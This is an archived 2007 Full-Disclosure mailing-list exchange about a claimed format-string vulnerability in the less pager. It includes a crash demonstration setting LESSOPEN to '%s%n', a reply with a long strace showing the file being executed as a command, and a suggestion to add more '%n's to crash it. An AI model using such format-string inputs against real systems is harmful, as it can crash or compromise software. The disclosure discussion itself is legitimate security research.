Re: [+] Vulnerability in less version 394 and prior
From: glopeda.com <glopeda () glopeda com>
Date: Wed, 31 Oct 2007 08:02:30 -0400
It's taking the arguments for the format string out of your environment; put a couple more %n's in and watch it die horribly. That's why I said "a meager demonstration." The emphasis was definitely on meager ;) On 10/31/07, Jeffrey Denton <dentonj () gmail com> wrote:
On 10/31/07, glopeda. com <glopeda () glopeda com> wrote:From: glopeda () glopeda com Application: less 394 and prior Type: Format strings vulnerability Priority: LowMeager demonstration: $ export LESSOPEN=%s%n $ less somefile Segmentation fault $Interesting... $ echo $LESSOPEN |lesspipe.sh %s $ export LESSOPEN=%s%n $ less iptraf.txt /bin/bash: ./iptraf.txt: Permission denied : No such file or directory $ less --version less 394 Copyright (C) 1984-2005 Mark Nudelman less comes with NO WARRANTY, to the extent permitted by law. For information about the terms of redistribution, see the file named README in the less distribution. Homepage: http://www.greenwoodsoftware.com/less $ id uid=1000(dentonj) gid=100(users) groups=11(floppy),17(audio),18(video),19(cdrom),83(plugdev),100(users) $ ls -l iptraf.txt -rw-r--r-- 1 dentonj users 300 2007-10-25 08:04 iptraf.txt $ echo $LESSOPEN %s%n $ cat /etc/slackware-version Slackware 12.0.0 $ strace /usr/bin/less iptraf.txt execve("/usr/bin/less", ["/usr/bin/less", "iptraf.txt"], [/* 47 vars */]) = 0 brk(0) = 0x8065000 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efb000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=111039, ...}) = 0 mmap2(NULL, 111039, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7edf000 close(3) = 0 open("/lib/libncursesw.so.5", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\352"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=309276, ...}) = 0 mmap2(NULL, 311172, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e93000 mmap2(0xb7ed7000, 32768, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x43) = 0xb7ed7000 close(3) = 0 open("/lib/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@_\1\000"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1528742, ...}) = 0 mmap2(NULL, 1316260, 
PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7d51000 mmap2(0xb7e8d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13c) = 0xb7e8d000 mmap2(0xb7e90000, 9636, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e90000 close(3) = 0 open("/lib/libdl.so.2", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0P\n\0\000"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=13506, ...}) = 0 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7d4d000 mmap2(0xb7d4f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0xb7d4f000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d4c000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d4c8d0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0xb7e8d000, 4096, PROT_READ) = 0 munmap(0xb7edf000, 111039) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 brk(0) = 0x8065000 brk(0x8086000) = 0x8086000 stat64("/home/dentonj/.terminfo", 0xbfc67624) = -1 ENOENT (No such file or directory) stat64("/usr/share/terminfo", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 access("/usr/share/terminfo/x/xterm", R_OK) = 0 open("/usr/share/terminfo/x/xterm", O_RDONLY|O_LARGEFILE) = 3 read(3, "\32\0010\0&\0\17\0\235\1F\5xterm|xterm terminal"..., 4097) = 2522 close(3) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 ioctl(1, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 ioctl(2, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 open("/usr/bin/.sysless", 
O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) open("/etc/sysless", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) open("/home/dentonj/.less", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory) open("/usr/share/locale/locale.alias", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=2586, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7efa000 read(3, "# Locale name alias data base.\n#"..., 4096) = 2586 read(3, "", 4096) = 0 close(3) = 0 munmap(0xb7efa000, 4096) = 0 open("/usr/lib/locale/en_US/LC_IDENTIFICATION", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=378, ...}) = 0 mmap2(NULL, 378, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7efa000 close(3) = 0 open("/usr/lib/locale/en_US/LC_MEASUREMENT", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=28, ...}) = 0 mmap2(NULL, 28, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef9000 close(3) = 0 open("/usr/lib/locale/en_US/LC_TELEPHONE", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=64, ...}) = 0 mmap2(NULL, 64, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef8000 close(3) = 0 open("/usr/lib/locale/en_US/LC_ADDRESS", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=160, ...}) = 0 mmap2(NULL, 160, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef7000 close(3) = 0 open("/usr/lib/locale/en_US/LC_NAME", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=82, ...}) = 0 mmap2(NULL, 82, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef6000 close(3) = 0 open("/usr/lib/locale/en_US/LC_PAPER", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=39, ...}) = 0 mmap2(NULL, 39, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef5000 close(3) = 0 open("/usr/lib/locale/en_US/LC_MESSAGES", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 close(3) = 0 open("/usr/lib/locale/en_US/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY) = 3 fstat64(3, 
{st_mode=S_IFREG|0644, st_size=57, ...}) = 0 mmap2(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef4000 close(3) = 0 open("/usr/lib/locale/en_US/LC_MONETARY", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=291, ...}) = 0 mmap2(NULL, 291, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef3000 close(3) = 0 open("/usr/lib/locale/en_US/LC_TIME", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=2459, ...}) = 0 mmap2(NULL, 2459, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef2000 close(3) = 0 open("/usr/lib/locale/en_US/LC_NUMERIC", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0 mmap2(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef1000 close(3) = 0 open("/usr/lib/locale/en_US/LC_CTYPE", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=207720, ...}) = 0 mmap2(NULL, 207720, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7d19000 close(3) = 0 open("/home/dentonj/.lesshst", O_RDONLY|O_LARGEFILE) = 3 fstat64(3, {st_mode=S_IFREG|0600, st_size=54, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000 read(3, ".less-history-file:\n.search\n\"rc\n"..., 4096) = 54 read(3, "", 4096) = 0 close(3) = 0 munmap(0xb7ef0000, 4096) = 0 open("/dev/tty", O_RDONLY|O_LARGEFILE) = 3 ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) = 0 fsync(3) = -1 EINVAL (Invalid argument) ioctl(3, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig -icanon -echo ...}) = 0 rt_sigaction(SIGINT, {0x805a220, [INT], SA_RESTART}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGTSTP, {0x805a260, [TSTP], SA_RESTART}, {SIG_DFL}, 8) = 0 rt_sigaction(SIGWINCH, {0x805a2a0, [WINCH], SA_RESTART}, {SIG_DFL}, 8) = 0 pipe([4, 5]) = 0 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d4c918) = 10823 close(5) = 0 fstat64(4, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000 read(4, /bin/bash: ./iptraf.txt: Permission denied "", 1024) = 0 
close(4) = 0 waitpid(10823, [{WIFEXITED(s) && WEXITSTATUS(s) == 126}], 0) = 10823 --- SIGCHLD (Child exited) @ 0 (0) --- munmap(0xb7ef0000, 4096) = 0 stat64(" ", 0xbfc68e10) = -1 ENOENT (No such file or directory) stat64(" ", 0xbfc68e90) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en_US/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/locale/en/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT (No such file or directory) open("/home/dentonj/.lesshst", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4 fchmod(4, 0600) = 0 fstat64(4, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef0000 write(4, ".less-history-file:\n.search\n\"rc\n"..., 54) = 54 close(4) = 0 munmap(0xb7ef0000, 4096) = 0 write(2, "\n: No such file or directory\n", 29 : No such file or directory ) = 29 fsync(3) = -1 EINVAL (Invalid argument) ioctl(3, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig icanon echo ...}) = 0 exit_group(1) = ? Process 10822 detached $ $ chmod 755 iptraf.txt $ less iptraf.txt ./iptraf.txt: line 1: 10.1.1.1:33073: command not found ./iptraf.txt: line 2: 10.1.1.2:54356: command not found . . . _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- Site: http://www.glopeda.com E-mail: glopeda () glopeda com Name: Mitch _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/